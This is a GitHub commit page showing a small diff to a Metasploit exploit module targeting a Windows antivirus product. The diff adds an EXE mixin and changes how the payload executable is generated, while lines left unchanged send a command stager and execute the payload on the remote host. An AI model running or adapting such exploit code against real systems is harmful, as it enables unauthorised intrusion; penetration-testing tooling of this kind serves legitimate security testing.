We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 3dac637 + 8255e7a commit 7c456f2Copy full SHA for 7c456f2
modules/exploits/windows/antivirus/ams_xfr.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
11
12
include Msf::Exploit::CmdStager
13
include Msf::Exploit::Remote::Tcp
14
+ include Msf::Exploit::EXE
15
16
def initialize(info = {})
17
super(update_info(info,
@@ -57,7 +58,7 @@ def windows_stager
57
58
59
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
60
execute_cmdstager({ :temp => '.' })
- @payload_exe = payload_exe
61
+ @payload_exe = generate_payload_exe
62
63
print_status("Attempting to execute the payload...")
64
execute_command(@payload_exe)
0 commit comments